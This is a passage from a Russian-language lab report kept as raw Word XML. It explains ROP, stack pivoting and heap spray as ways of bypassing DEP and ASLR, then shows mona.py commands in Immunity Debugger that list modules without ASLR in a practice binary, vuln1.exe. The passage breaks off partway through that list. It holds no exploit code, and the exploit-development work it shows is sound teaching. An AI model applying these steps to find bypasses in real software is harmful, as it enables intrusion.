        <w:t>Вместо внедрения шелл-кода злоумышленник использует цепочки коротких последовательностей инструкций (гаджетов), уже присутствующих в памяти программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065A9987" w14:textId="78F923E2" w:rsidR="00C90EE9" w:rsidRDefault="002C68D4" w:rsidP="002C68D4">
      <w:r w:rsidRPr="002C68D4">
        <w:t>Каждый гаджет заканчивается инструкцией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C68D4">
        <w:t>ret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C68D4">
        <w:t>, что позволяет передавать управление следующему гаджету в цепочке. Таким образом, атакующий может комбинировать существующий код для выполнения произвольных операций, даже если исполнение данных запрещено (NX/DEP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D74305" w14:textId="3F8F9037" w:rsidR="004B03E5" w:rsidRDefault="004B03E5" w:rsidP="002C68D4">
      <w:r w:rsidRPr="004B03E5">
        <w:t xml:space="preserve">ROP полезен для обхода методов рандомизации расположения адресного пространства (ASLR) и DEP. При использовании ROP злоумышленник использует свой контроль над стеком непосредственно перед возвратом из функции, чтобы перенаправить выполнение кода в какое-либо другое место программы. </w:t>
      </w:r>
      <w:r w:rsidR="001B3600">
        <w:t>З</w:t>
      </w:r>
      <w:r w:rsidRPr="004B03E5">
        <w:t>лоумышленники могут легко найти часть кода, которая находится в фиксированном месте (в обход ASLR) и является исполняемой (в обход DEP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B664B88" w14:textId="77777777" w:rsidR="00555F47" w:rsidRDefault="00555F47" w:rsidP="00C90EE9"/>
    <w:p w14:paraId="6E556E68" w14:textId="2270786B" w:rsidR="00CC429A" w:rsidRDefault="00CC429A" w:rsidP="00CC429A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Stack Pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC213E4" w14:textId="2879A63C" w:rsidR="00337BC9" w:rsidRDefault="00FE4BC3" w:rsidP="00337BC9">
      <w:r>
        <w:t>Переключение стека (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4BC3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pivoting</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4BC3">
        <w:t>) — это техника эксплуатации, при которой злоумышленник изменяет значение указателя стека (ESP/RSP), перенаправляя его в контролируемую область памяти.</w:t>
      </w:r>
      <w:r w:rsidR="00FA2DAE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666E84D2" w14:textId="77777777" w:rsidR="00756888" w:rsidRDefault="00756888" w:rsidP="00756888">
      <w:r>
        <w:t>Техника включает два основных компонента:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA46CE" w14:textId="1A19B796" w:rsidR="00756888" w:rsidRDefault="00756888" w:rsidP="00984188">
      <w:pPr>
        <w:pStyle w:val="a2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t>Поддельные фреймы стека – указатель стека перенаправляется в область данных, контролируемую атакующим (например, кучу или другой буфер), вместо настоящего стека</w:t>
      </w:r>
      <w:r w:rsidR="00932438">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB1080" w14:textId="66718DC9" w:rsidR="00756888" w:rsidRDefault="00756888" w:rsidP="00984188">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r>
        <w:t>ROP-цепочки – короткие последовательности инструкций (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gadgets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>), позволяющие атакующему управлять потоком выполнения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495BE30C" w14:textId="53A4B2CD" w:rsidR="00756888" w:rsidRPr="00FE4BC3" w:rsidRDefault="00756888" w:rsidP="00756888">
      <w:r>
        <w:t>Таким образом, злоумышленник получает контроль над параметрами функций, адресами возврата и обработчиками исключений, что позволяет выполнить произвольный код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD03587" w14:textId="77777777" w:rsidR="00A053EF" w:rsidRPr="00337BC9" w:rsidRDefault="00A053EF" w:rsidP="00337BC9"/>
    <w:p w14:paraId="288A64E4" w14:textId="491357A8" w:rsidR="00CC429A" w:rsidRDefault="00CC429A" w:rsidP="00CC429A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Heap Spray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01947A51" w14:textId="52749860" w:rsidR="004A04FF" w:rsidRDefault="00760350" w:rsidP="004A04FF">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00760350">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Spray</w:t>
      </w:r>
      <w:r w:rsidRPr="00760350">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>представляет собой, в первую очередь, метод доставки полезной нагрузки</w:t>
      </w:r>
      <w:r w:rsidR="00263E76">
        <w:t xml:space="preserve"> и заключается в заполнении кучи большим количеством копий полезной нагрузки в целях повышения вероятности перехода выполнения на одну из размещенных копий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4147B546" w14:textId="77777777" w:rsidR="00BE0E54" w:rsidRPr="00BE0E54" w:rsidRDefault="00BE0E54" w:rsidP="00BE0E54">
      <w:r w:rsidRPr="00BE0E54">
        <w:t>Эта техника может использоваться для обхода ASLR (рандомизации адресного пространства), так как куча заполняется множеством одинаковых блоков, и атакующему не нужно знать точный адрес для перехвата управления.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B327D28" w14:textId="77777777" w:rsidR="00BE0E54" w:rsidRPr="00760350" w:rsidRDefault="00BE0E54" w:rsidP="004A04FF"/>
    <w:p w14:paraId="57DD02D9" w14:textId="77777777" w:rsidR="00B75F91" w:rsidRDefault="00B75F91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14:paraId="3A4CDD41" w14:textId="33657F9A" w:rsidR="003A6509" w:rsidRDefault="00C61237" w:rsidP="003A6509">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ХОД РАБОТЫ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB32C70" w14:textId="763BCFC9" w:rsidR="0008222C" w:rsidRDefault="00D10D48" w:rsidP="004E0058">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Получение списка загруженных в процесс модулей, не использующих </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C55CD3F" w14:textId="77777777" w:rsidR="00C41D2E" w:rsidRDefault="00C41D2E" w:rsidP="008367F1">
      <w:r>
        <w:t xml:space="preserve">Для получения списка загруженных в процесс модулей, не использующих </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, использовался скрипт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidRPr="008367F1">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008367F1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:r w:rsidRPr="008367F1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:r w:rsidRPr="008367F1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2F01">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380A9FA2" w14:textId="6D1F35F7" w:rsidR="008367F1" w:rsidRDefault="006F2F01" w:rsidP="008367F1">
      <w:r>
        <w:t>Был</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2F01">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>установлен</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2F01">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2F01">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2F01">
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2F01">
        <w:t xml:space="preserve"> 2.7 (</w:t>
      </w:r>
      <w:r>
        <w:t>требование программы)</w:t>
      </w:r>
      <w:r w:rsidR="00CE7804" w:rsidRPr="00CE7804">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00CE7804">
        <w:t xml:space="preserve">скрипт </w:t>
      </w:r>
      <w:r w:rsidR="00CE7804">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidR="00CE7804" w:rsidRPr="00CE7804">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE7804">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE7804" w:rsidRPr="00CE7804">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE7804">
        <w:t xml:space="preserve">был помещен в директорию </w:t>
      </w:r>
      <w:r w:rsidR="00CE7804" w:rsidRPr="00184FFC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«C:\Program Files (x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CE7804" w:rsidRPr="00184FFC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>86)\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CE7804" w:rsidRPr="00184FFC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immunity Inc\Immunity Debugger\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE7804" w:rsidRPr="00184FFC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PyCommands</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE7804" w:rsidRPr="00184FFC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00184FFC" w:rsidRPr="00184FFC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00184FFC">
        <w:t xml:space="preserve">Для проверки «видимости» скрипта можно ввести </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00184FFC">
        <w:t xml:space="preserve">команду </w:t>
      </w:r>
      <w:r w:rsidR="00184FFC" w:rsidRPr="00184FFC">
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidR="00184FFC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00184FFC">
        <w:t xml:space="preserve">, как показано на </w:t>
      </w:r>
      <w:r w:rsidR="006071EC">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006071EC">
        <w:instrText xml:space="preserve"> REF _Ref212411510 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="006071EC">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006071EC">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="006071EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="006071EC">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00184FFC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B11386" w14:textId="77777777" w:rsidR="00184FFC" w:rsidRDefault="00184FFC" w:rsidP="00184FFC">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00184FFC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AF377AB" wp14:editId="020E5CA1">
            <wp:extent cx="6300470" cy="546354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A655" w14:textId="4612D951" w:rsidR="00184FFC" w:rsidRPr="00184FFC" w:rsidRDefault="00184FFC" w:rsidP="00EF46B6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Ref2124115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0</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:t xml:space="preserve"> – Выходные данные </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">команды </w:t>
      </w:r>
      <w:r w:rsidRPr="00184FFC">
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mo</w:t>
      </w:r>
      <w:r w:rsidR="00F6117B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="703B1035" w14:textId="77777777" w:rsidR="008367F1" w:rsidRDefault="008367F1" w:rsidP="008367F1"/>
    <w:p w14:paraId="158735E6" w14:textId="606E8009" w:rsidR="00272818" w:rsidRDefault="00272818" w:rsidP="008367F1">
      <w:r>
        <w:t xml:space="preserve">Была создана рабочая директория </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> командой:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2695A5BE" w14:textId="5E5A5689" w:rsidR="00272818" w:rsidRPr="00AB4905" w:rsidRDefault="00272818" w:rsidP="00852FAA">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00272818">
        <w:lastRenderedPageBreak/>
        <w:t>!mona</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00272818">
        <w:t xml:space="preserve"> config -set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00272818">
        <w:t>workingfolder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00545DD4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00852FAA" w:rsidRPr="00852FAA">
        <w:t>C:\Users\butin\PycharmProjects\mbks1\mbks2_mona</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E69B6E9" w14:textId="01009780" w:rsidR="008B3472" w:rsidRPr="008B3472" w:rsidRDefault="008B3472" w:rsidP="00E82DFC">
      <w:r>
        <w:t xml:space="preserve">Успешное завершение шага показано на </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>рисунке .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B80FA1A" w14:textId="77777777" w:rsidR="00E82DFC" w:rsidRDefault="008B3472" w:rsidP="00E82DFC">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3472">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74C11043" wp14:editId="30F5D98A">
            <wp:extent cx="6300470" cy="1155065"/>
            <wp:effectExtent l="0" t="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1DDB" w14:textId="12DA638B" w:rsidR="008B3472" w:rsidRDefault="00E82DFC" w:rsidP="00E82DF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1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Создание рабочей директории </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FDE813" w14:textId="77777777" w:rsidR="00367C22" w:rsidRDefault="00367C22" w:rsidP="00367C22"/>
    <w:p w14:paraId="315F8EE4" w14:textId="794ACABF" w:rsidR="005F17E7" w:rsidRDefault="005F17E7" w:rsidP="00367C22">
      <w:r>
        <w:t xml:space="preserve">Для начала работы с файлом требуется открыть его (исследуется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:r w:rsidRPr="005F17E7">
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="005F17E7">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Вид рабочего окна при успешном открытии показан на </w:t>
      </w:r>
      <w:r w:rsidR="005129FE">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005129FE">
        <w:instrText xml:space="preserve"> REF _Ref212412258 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="005129FE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005129FE">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="005129FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="005129FE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166B1888" w14:textId="77777777" w:rsidR="005F17E7" w:rsidRDefault="005F17E7" w:rsidP="005F17E7">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54B0264B" wp14:editId="1D14CBCD">
            <wp:extent cx="6300470" cy="3422650"/>
            <wp:effectExtent l="0" t="0" r="508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028" w14:textId="74D0AB41" w:rsidR="005F17E7" w:rsidRPr="00AB4905" w:rsidRDefault="005F17E7" w:rsidP="005F17E7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Ref2124122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2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t xml:space="preserve"> – Программа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:r w:rsidRPr="005F17E7">
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:r w:rsidRPr="005F17E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1572DB4A" w14:textId="77777777" w:rsidR="005F17E7" w:rsidRPr="00AB4905" w:rsidRDefault="005F17E7" w:rsidP="005F17E7"/>
    <w:p w14:paraId="5C1D5184" w14:textId="1DDE712A" w:rsidR="00367C22" w:rsidRDefault="00D744B7" w:rsidP="00367C22">
      <w:r>
        <w:t xml:space="preserve">Скрипт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidRPr="00D744B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">позволяет просмотреть списки библиотек, использующих и не использующих </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ALSR</w:t>
      </w:r>
      <w:r>
        <w:t>, что показано на рисунке, при помощи команд:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0D370F" w14:textId="77777777" w:rsidR="00631E25" w:rsidRPr="00631E25" w:rsidRDefault="00631E25" w:rsidP="00EB11B3">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00631E25">
        <w:t>!mona</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00631E25">
        <w:t xml:space="preserve"> modules -cm </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00631E25">
        <w:t>aslr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00631E25">
        <w:t>=false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA41D18" w14:textId="4F465721" w:rsidR="00631E25" w:rsidRDefault="00631E25" w:rsidP="00EB11B3">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00631E25">
        <w:t>!mona</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00631E25">
        <w:t xml:space="preserve"> modules -cm </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00631E25">
        <w:t>aslr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00631E25">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EE6EE3" w14:textId="499E4A6D" w:rsidR="009E0772" w:rsidRPr="009E0772" w:rsidRDefault="009E0772" w:rsidP="009E0772">
      <w:r>
        <w:t xml:space="preserve">Результат выполнения скрипта показан на </w:t>
      </w:r>
      <w:r w:rsidR="001A1ADF">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001A1ADF">
        <w:instrText xml:space="preserve"> REF _Ref212412367 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="001A1ADF">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="001A1ADF">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="001A1ADF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="001A1ADF">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="001A1ADF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB6CB17" w14:textId="77777777" w:rsidR="007A6BFC" w:rsidRDefault="007A6BFC" w:rsidP="007A6BFC">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A6BFC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CD5710A" wp14:editId="14C878A0">
            <wp:extent cx="6300470" cy="259334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A937" w14:textId="0016F33A" w:rsidR="007A6BFC" w:rsidRDefault="007A6BFC" w:rsidP="00287A1C">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Ref2124123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3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidRPr="007A6BFC">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Просмотр списков </w:t>
      </w:r>
      <w:r w:rsidR="005023FD">
        <w:t>библиотек,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> использующих и не использующих </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F02F27B" w14:textId="77777777" w:rsidR="008C67CE" w:rsidRPr="008C67CE" w:rsidRDefault="008C67CE" w:rsidP="008C67CE"/>
    <w:p w14:paraId="7DDC9E9B" w14:textId="77777777" w:rsidR="00CA1C8D" w:rsidRDefault="008C67CE" w:rsidP="00CA1C8D">
      <w:r>
        <w:t>Изучив таблицу используемых модулей</w:t>
      </w:r>
      <w:r w:rsidR="00286A7D">
        <w:t>, можно увидеть, что используются:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF4990" w14:textId="0D0A109D" w:rsidR="00CA1C8D" w:rsidRDefault="00CA1C8D" w:rsidP="00CA1C8D">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA1C8D">
        <w:t>vuln1.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR=True)</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D73416" w14:textId="1118A21D" w:rsidR="00CA1C8D" w:rsidRDefault="00CA1C8D" w:rsidP="00CA1C8D">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA1C8D">
        <w:t xml:space="preserve">KERNELBASE.dll </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR=True)</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC389EC" w14:textId="3B707030" w:rsidR="00CA1C8D" w:rsidRDefault="004429A0" w:rsidP="00CA1C8D">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="004429A0">
        <w:t xml:space="preserve">apphelp.dll </w:t>
      </w:r>
      <w:r w:rsidR="00CA1C8D">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00CA1C8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR=True)</w:t>
      </w:r>
      <w:r w:rsidR="00CA1C8D">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5598CCD6" w14:textId="27E9D28E" w:rsidR="00CA1C8D" w:rsidRDefault="0010012D" w:rsidP="00CA1C8D">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="0010012D">
        <w:t xml:space="preserve">KERNEL32.DLL </w:t>
      </w:r>
